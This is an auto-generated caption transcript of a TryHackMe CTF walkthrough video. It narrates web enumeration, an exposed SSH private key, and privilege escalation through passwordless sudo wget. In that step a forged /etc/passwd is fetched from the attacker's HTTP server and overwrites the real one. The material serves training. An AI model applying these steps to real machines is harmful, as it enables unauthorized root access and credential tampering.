TryHackMe! Wget for Privilege Escalation

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hello everyone my name is john hammond and welcome back to the video and we're going to be taking a look at the wgell ctf from tryhackme so i have this over up on my screen here uh this is a free room so you don't need to be subscribed in order to access it it says simply have fun with this easy box and the only prompts we have are user flag and root flag so once our machine spins up we should just have an ip address to muff around with i'll clean out some of my notes from a previous video looks like that shell super broke so i'll reset this here and let's make a directory for wgell ctf i think that's how you say that i have no idea let's create a simple readme file for this so we can keep track of our notes i will go ahead and export that ip address here slap that into my shell let's see if i can ping that machine if he's up already for us still taking his time so let's go ahead and build out our tasking things just to have this here user flag that should be one and two should be root flag so let's burn through this here let's see what we got that machine is still spinning up so let's take a little bit of time anyway we can go ahead and make our nmap directory to stage that and get that ready we'll also grab that export ip command and we will start to end map tech sc tag sv tac on nmap initial let's run that on the ip address and let's kind of hang tight until that machine comes up for us maybe it's also just actually not kind of i don't know showcasing pings we can get uh just go access the web page itself and see if that is alive nothing at the moment so we'll stand by uh we are so connected to our ip address or our vpn are we not verifying okay looks like it's good i'll just hang tight and wait stand by okay looks like he is uh responding now so how's that web page look if i were to refresh this guy still taking his time let's fire off her nmap scan regardless see if he comes up soon or if our nmap scan dies as well okay so now this uh web page seems to load it's weird to me because it's it's an apache to default page which we see all the time but it's weird that some of the notions here aren't like some of the files here aren't filled out uh let's just view the source here see we have lot of css kind of default stuff items are commented out jesse don't forget to udate the web is it okay so update the website jesse that's a peculiar name um let's start some other enumeration on that let's go ahead and neato tac http on that ip address he's going along um let's start go buster as well oh is that nmap scan done didn't find 80 but found ssh and some funky ones so i guess i'll rerun that um let's grab this again for this new shell down here and let's do some go buster let's do go buster attack u on that ip address i'm going to specify my word list for opt directory listing let's see if i can figure any of that out um site map what the what okay it's worth seeing if that's a thing maybe there's some other information that we have not seen before site map that gives me a 301 and redirects me somewhere so let's see if that page loads unapp template what the heck take on your biggest projects and goals so this looks like a whole directory this is a this is a folder thing uh let's actually restart that go buster and see if we can figure out anything else inside of sitemap and i'll bump around and hear it works goes to work html services okay so these are all pages don't seem to have anything interesting contact info that looks fake info at your site your website go buster found images good enough i'm just gonna slowly poke through these about younapp is this actually a video let's see oh that's a thing that's a real thing that's got timestamps and everything let's not play that on my youtube channel dorothy murphy no one else adam morris adam what are you doing dude that's not how you drink drinks about okay the page does not change when it says services is still saying that thing shop html contact html can i views contact uh maybe we can muff around with that form too that's an option cssjs automatic backup data let's check is there a robots.txt file hidden over any of these sometimes it's supposed to be in the root directory but it's not always is there a dot get directory in there no but like is it bzr or what is it for bizarre there's some weird stuff in there fonts so you're just getting stuff at the moment grid works with grid um let's look back at our other enumerations because we still have nikto running and nmap finish looks like it found those um what other options we have we can still run durb because go buster is good to have that but durb also has some other worthwhile um dictionary files like some of the stuff that they share for apache these are really cool if you go take a look at these it'll have some other files like that might be more likely on a web server so they have one um common i think it's called cat and that's in durboardlist's common.txt that has some good good stuff so let's try him uh i'll do the same go buster attack u on my p address but i'll use the word list from common let's see if he finds anything else there okay so hta oh let's do that in the site map because we know that we have some stuff in there but we did see the hd password let me go take a look at that ht password i cannot read that what about ht access maybe nope still no okay oh what the what there is a dot ssh directory seemingly within sitemap so let's try and navigate to that if it loads whoa okay we have an idrc file so that's a private key nice sweet so um we could try uh we don't need really you need to anymore let's just make that id rsa file um and we know that username was jesse right let me check page i thought it was jessica that i misread that earlier blah blah blah where'd it go jesse jesse jesse so that's the name okay so let's actually move let's call that jessie id rsa and let's make that 600 so it is an ssh key that ssh would be willing to use um let me grab i accidentally nerfed my shell just a moment ago so uh ssh attack i i uh jessie to jesse at the ip address see if that connects oh and it logs me right in okay awesome so seemingly no flag um oh that's a lot of stuff find grep flag it's in documents cat that flag out there we go let's slap that in here there's our user flag and we could go ahead and ssh copy some stuff over so scp tac i jesse at that let's move lin p's over into jesse at let's grab that ip address add this guy in dev shm see if that will work for us okay copied it over just fine so dev is hm let's try and privesque i'll run lin p's and see if we get any good stuff whoa okay i already felt like i saw some potential protest techniques in there stuff in my path is potentially writable uh i am pseudo i'm in the pseudo group what isn't that whoa user jesse may on the following commands no password on wget okay let's go check out gtfo bins and see if we can do things with wget wget file upload sewage sudo fetch a remote file via http get hmm i can only file download and file upload so we could get a root flag but we could also get a root password we could set a root password and that might be kind of cool let's do that let's let's see let's see if we can pull that off so okay you can stop that um little nps let's take this etc password and let's fake a root password we could use um let's create a simple new entry or let's modify the root entry and etc password right here with our own password that we want to supply so we could do that with python um i'll get to a regular shell that's on my host let's go ahead and python import crypt and i think it's crypt.crypt and the password we want to use so i'll just say please sub as our password and let's copy this string yep yep yep let's paste that in so let's call this a password file so let's um get back to the victim let's try and actually make a copy of etc password to etc password dot back and i can't do that so let's put it in dev shm so we have a place we can write to so if we could download files we could host our new bad one our new bad etc password that has our custom command or password for root in there and we could overwrite that so we have our own password set for us because we can sudo w guess so studio w get looks like it works let's go spin up a server on our attacker machine http dot server port 8000 uh i believe i am still 10 8 9 1 112 yep yep yep so let's get http 10 8 9 1 112 at port 8000 let's grab that password file and it needs to have tac capital o to where it wants to store it so let's put it in etcetera password and it wrote it okay so let's check out cated center password on the victim and now we have our fudged password for root so we could s u to root with please sub as our password and our roots now we have a root shell and we wouldn't need to we could have just exfiltrated like okay grab the flag with um getting the file and sending it to our own machine but i think it's much more fun to actually get a root shell so that technique just clobbering etc password with our own set password for an account will help us do that because we could write to etc password which is pretty cool let's go ahead now into root and grab that root flag cat root flag thank you thank you and we're done that's that machine so pretty cool super nice pretty easy uh i like that wget privesque um i i hope that technique is kind of neat for just clobbering that etcetera password entry um again the other option is just exfiltrating that flag out but kind of neat to get that initial access with um finding the username and finding that directory in the flag or in the website so that was that was very very cool i think so hope you guys enjoyed this video i hope you guys enjoyed this room i thought it was kind of neat um but again just wanted to showcase it to you if you did like the video please do press that like button comment button type things in and hit enter subscribe button you know the picture of my face and all that stupid stuff so thanks everybody i'll see you in the next video [Music] [Music] you
Info
Channel: John Hammond
Views: 66,407
Rating: undefined out of 5
Keywords:
Id: fq2EKJ3-fp8
Channel Id: undefined
Length: 14min 6sec (846 seconds)
Published: Thu May 14 2020
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.